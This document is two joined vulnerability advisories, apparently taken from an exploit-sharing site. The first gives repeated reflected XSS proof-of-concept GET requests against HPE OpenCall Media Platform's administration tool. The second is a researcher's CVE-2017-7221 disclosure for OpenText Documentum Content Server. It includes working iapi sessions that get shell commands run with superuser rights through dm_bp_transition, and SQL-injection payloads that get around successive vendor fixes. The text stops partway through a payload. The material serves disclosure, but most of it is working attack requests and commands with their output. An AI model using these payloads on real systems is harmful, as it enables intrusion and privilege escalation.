User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFMonitorMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive

Platform Administration Tool – LEV_TYPE0 parameter

HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_TYPE0 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).

The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T021985″><script>alert(1)<
%2fscript>0ca30&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3

Proof of Concept

An Attacker send the following GET request to the victims machine :


GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T021985"><script>alert(1)<%2fscript>0ca30&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive

Platform Administration Tool – LEV_TYPE1 parameter

HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_TYPE1 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).

The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T14527a”><script>alert(1)<
%2fscript>2d848&LEV_TYPE2=T2&LEV_TYPE3=T3

Proof of Concept

An Attacker send the following GET request to the victims machine :


GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T14527a"><script>alert(1)<%2fscript>2d848&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive

Platform Administration Tool – LEV_TYPE2 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_TYPE2 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).

The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2522b2″><script>alert(1)<
%2fscript>54f45&LEV_TYPE3=T3

Proof of Concept
An Attacker send the following GET request to the victims machine :


GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2522b2"><script>alert(1)<%2fscript>54f45&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive

Platform Administration Tool – LEV_TYPE3 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_TYPE3 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).

The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3ecc32″><script>alert(1)<
%2fscript>54a0f

Proof of Concept

An Attacker send the following GET request to the victims machine :

GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3ecc32"><script>alert(1)<%2fscript>54a0f
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive

Platform Administration Tool – LEV_NAME0 parameter

HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_NAME0 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).

The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0fa802″><script>alert(1)<
%2fscript>671a8&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3

Proof of Concept

An Attacker send the following GET request to the victims machine :


GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0fa802"><script>alert(1)<%2fscript>671a8&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive

Platform Administration Tool – LEV_NAME1 parameter

HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_NAME1 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).

The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1f530e”><script>alert(1)<
%2fscript>d677f&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3

Proof of Concept

An Attacker send the following GET request to the victims machine :

GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1f530e"><script>alert(1)<%2fscript>d677f&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive

Platform Administration Tool – LEV_NAME2 parameter

HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_NAME2 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).

The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N261a9f”><script>alert(1)<
%2fscript>118f3&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3

Proof of Concept

An Attacker send the following GET request to the victims machine:

GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N261a9f"><script>alert(1)<%2fscript>118f3&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive

Platform Administration Tool – LEV_NAME3 parameter

HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_NAME3 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).

The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N30c4b8″><script>alert(1)<
%2fscript>c10b2&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3

Proof of Concept

An Attacker send the following GET request to the victims machine:

GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N30c4b8"><script>alert(1)<%2fscript>c10b2&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive

Platform Administration Tool – GetMapAction function

HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function input. An attacker can inject malicious Java script to
trigger the Reflected Cross-Site Scripting (XSS).

The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTMLaec5a”><script>alert(1)<
%2fscript>70733&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3

Proof of Concept

An Attacker send the following GET request to the victims machine:

GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTMLaec5a"><script>alert(1)<%2fscript>70733&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive

Platform Administration Tool – LEV_NUM parameter

HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_NUM input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).

The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=00b96d”><script>alert(1)<
%2fscript>58400&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3

Proof of Concept

An Attacker send the following GET request to the victims machine:

GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=00b96d"><script>alert(1)<%2fscript>58400&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive

Platform Administration Tool – NAME parameter

HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter NAME input. An attacker can inject malicious Java
script to trigger the Reflected Cross-Site Scripting (XSS).

The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root8c0d0″><script>alert(1)<
%2fscript>b811a&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3

Proof of Concept

An Attacker send the following GET request to the victims machine:

GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root8c0d0"><script>alert(1)<%2fscript>b811a&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive

Platform Administration Tool – next parameter

HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch
function parameter next input. An attacker can inject malicious Java
script to trigger the Reflected Cross-Site Scripting (XSS).

The vulnerable URL: GET
/OCMPOAM/cdrdispatch?sessionType=ACTIVE&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePagea908f<script>alert(1)<
%2fscript>2f6bfa40b3d&CallSessionList=ACTIVE

Proof of Concept

An Attacker send the following GET request to the victims machine:

GET /OCMPOAM/cdrdispatch?sessionType=ACTIVE&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePagea908f<script>alert(1)<%2fscript>2f6bfa40b3d&CallSessionList=ACTIVE
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePage&sessionType=NONE
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive

Platform Administration Tool – next parameter

HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch
function parameter sessionType input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).

The vulnerable URL:
/OCMPOAM/cdrdispatch?sessionType=25ed6″><script>alert(1)<
%2fscript>1b604fa73f3&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePage&CallSessionList=ACTIVE

Proof of Concept

An Attacker send the following GET request to the victims machine:

GET /OCMPOAM/cdrdispatch?sessionType=25ed6"><script>alert(1)<%2fscript>1b604fa73f3&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePage&CallSessionList=ACTIVE
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePage&sessionType=NONE
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive

CVE’s

CVE-2017-5799 – Remote Code Execution
CVE-2017-5798 – Reflected Cross-Site Scripting (XSS)
HireHackking 
'''
CVE Identifier: CVE-2017-7221
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available
PoC: https://gist.github.com/andreybpanfilov/0a4fdfad561e59317a720e702b0fec44

Description: 

all versions of Documentum Content Server contain dm_bp_transition docbase 
method ("stored procedure”) which is written on basic, implementation of this docbase 
methods does not properly validate user input which allows attacker to execute arbitrary 
code with superuser privileges.

Related code snippet is:

==========================================8<========================================

'Evaluate the user-defined entry criteria
If (result = True And run_entry = "T") Then
If (debug = True) Then
PrintToLog sess, "Run user defined entry criteria."
End If
'
' researcher comment:
' userEntryID parameter is controlled by attacker
'
result = RunProcedure(userEntryID, 1, sess, sysID,_
user_name, targetState)
End If

...

'
' researcher comment:
' procID parameter is controlled by attacker
'

Function RunProcedure(procID As String, procNo As Integer,_
sessID As String, objID As String, userName As String,_
targetState As String) As Boolean

...

StartIt:
If (procID <> "0000000000000000") Then
result = CheckStatus("", 1, "loading procedure " & procID, True, errorMsg)
'
' researcher comment:
' here basic interpreter loads content of user-provided script
' from underlying repostiory using following technique:
' 
' checking that it is dealing with dm_procedure object
' (check was introduced in CVE-2014-2513):
' id,c,dm_procedure where r_object_id='procID'
' 
' getting content of basic script
' fetch,c,procID
' getpath,c,l
'

result = external(procID)
If (result = True) Then
If (procNo = 1) Then
' --- Running user-defined entry criteria ---
result = CheckStatus("", 1, "Running EntryCriteria", True, errorMsg)
On Error Goto NoFunction
'
' researcher comment
' here dmbasic interpreter executes user defined function
'
result = EntryCriteria(sessID, objID, userName,_
targetState, errorStack)
If (result = False) Then
errorStack = "[ErrorCode] 1500 [ServerError] " + _
errorStack
End If

==========================================>8========================================

So, attacker is able to create it’s own basic procedure in repository and pass it’s identifier
as argument for dm_bp_transition procedure:


==========================================8<========================================
$ cat /tmp/test
cat: /tmp/test: No such file or directory
$ cat > test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
ByVal ObjectId As String,_
ByVal UserName As String,_
ByVal TargetState As String,_
ByRef ErrorString As String) As Boolean
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
EntryCriteria=True
End Function
$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): unprivileged_user
Please enter password for unprivileged_user:


EMC Documentum iapi - Interactive API interface
(c) Copyright EMC Corp., 1992 - 2011
All rights reserved.
Client Library Release 6.7.1000.0027


Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info: "Session 0101d920800b1a37
started for user unprivileged_user."


Connected to Documentum Server running Release 6.7.1090.0170 Linux.Oracle
Session id is s0
API> create,c,dm_procedure
...
0801d920804e5416
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with method='dm_bp_transition',
arguments='repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 0801d920804e5416 0000000000000000 0000000000000000
0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000'
(1 row affected)

API> Bye
$ cat /tmp/test
dm_bp_transition_has_vulnerability

==========================================>8========================================


Vendor was been notified about this vulnerability on November 2013 using customer 
support channel, after a while vendor started claiming that this vulnerability 
was remediated, though no CVE was announced. Moreover, the fix was contested
and CERT/CC started tracking this vulnerability, the PoC provided
to CERT/CC was:

==========================================8<========================================
Vendor have decided that the root cause of problem is users are able to
create dm_procedure objects, and now in Documentum Content Server
v6.7SP1P26 we have following behavior:

[DM_SESSION_I_SESSION_START]info: "Session 0101d920800f0174 started for
user unprivileged_user."


Connected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle
Session id is s0
API> create,c,dm_procedure
...
0801d920805929d0
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
[DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user
(unprivileged_user) needs to have superuser or sysadmin privilege."

BUT:

API> create,c,dm_document
...
0901d920805929dd
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK

API> ?,c,execute do_method with
method='dm_bp_transition',arguments='repo repo dmadmin ""
0000000000000000 0000000000000000 0000000000000000 0901d920805929dd
0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T
dmadmin 0000000000000000'
(1 row affected)

....

API> Bye
~]$ cat /tmp/test
dm_bp_transition_has_vulnerability
~]$

==========================================>8========================================

On July 2014 vendor announced ESA-2014-064 which was claiming that vulnerability has been remediated.

On November 2014 fix was contested (there was significant delay after ESA-2014-064 because vendor 
constantly fails to provide status of reported vulnerabilities) by providing another proof of concept, 
description provided to CERT/CC was:

==========================================8<========================================
I have tried to reproduce PoC, described in VRF#HUFPRMOP, and got following
error:

[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected
error: [DM_API_W_NO_MATCH]warning: "There was no match in the
docbase for the qualification: dm_procedure where r_object_id =
'0801fd08805c9dfe'"

Such behaviour means that EMC tried to remediate a security issue by
"checking" object type of supplied object:

Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe'
...
[DM_API_W_NO_MATCH]warning: "There was no match in the docbase for the
qualification: dm_procedure where r_object_id = '0801fd08805c9dfe'"

API> Bye

bin]$ strings dmbasic| grep dm_procedure
id,%s,dm_procedure where object_name = '%s' and folder('%s')
id,%s,dm_procedure where r_object_id = '%s'
# old version of dmbasic binary
bin]$ strings dmbasic| grep dm_procedure
bin]$

So, the fix was implemented in dmbasic binary, the problem is neither 6.7
SP2 P15 nor 6.7 SP1 P28 patches contain dmbasic binary - the first patch
that was shipped with dmbasic binary was 6.7SP2 P17. Moreover, the
issue is still reproducible because introduced check could be bypassed
using SQL injection:

~]$ cat test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
ByVal ObjectId As String,_
ByVal UserName As String,_
ByVal TargetState As String,_
ByRef ErrorString As String) As Boolean
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
EntryCriteria=True
End Function
~]$ cat /tmp/test
cat: /tmp/test: No such file or directory

~]$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): test01
Please enter password for test01:


EMC Documentum iapi - Interactive API interface
(c) Copyright EMC Corp., 1992 - 2011
All rights reserved.
Client Library Release 6.7.2190.0142


Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info: "Session 0101fd088014000c started for
user test01."


Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> create,c,dm_sysobject
...
0801fd08805c9dfe
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'

...

(1 row affected)

API> Bye
~]$ cat /tmp/test
dm_bp_transition_has_vulnerability
~]$

Here "union ..." allows to bypass check based on "id" call:

Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union
select r_object_id from dm_sysobject where
r_object_id='0801fd08805c9dfe'
...
0801fd08805c9dfe
API> apply,c,,GET_LAST_SQL
...
q0
API> next,c,q0
...
OK
API> get,c,q0,result
...

select all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where
((dm_procedure.r_object_id='0801fd08805c9dfe,')) and
(dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0)
union select all dm_sysobject.r_object_id from dm_sysobject_sp
dm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe'))
and (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0)

API> close,c,q0
...
OK

Comma is required to bypass error in fetch call:
API> fetch,c,0801fd08805c9dfe' union select r_object_id from
dm_sysobject where r_object_id='0801fd08805c9dfe
...
[DM_API_E_BADID]error: "Bad ID given: 0801fd08805c9dfe' union
select r_object_id from dm_sysobject where r_object_id=
'0801fd08805c9dfe"


API> fetch,c,0801fd08805c9dfe,' union select r_object_id from
dm_sysobject where r_object_id='0801fd08805c9dfe
...
OK
==========================================>8========================================

On August 2015 vendor had undertaken another attempt to remediate this vulnerability
check ESA-2015-131/CVE-2015-4533 for details.

On August 2015 the fix was contested, check http://seclists.org/bugtraq/2015/Aug/110
for detailed description - I just demonstrated another attack vector - using 
UNION ALL keyword instead of UNION:

=================================8<================================
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'

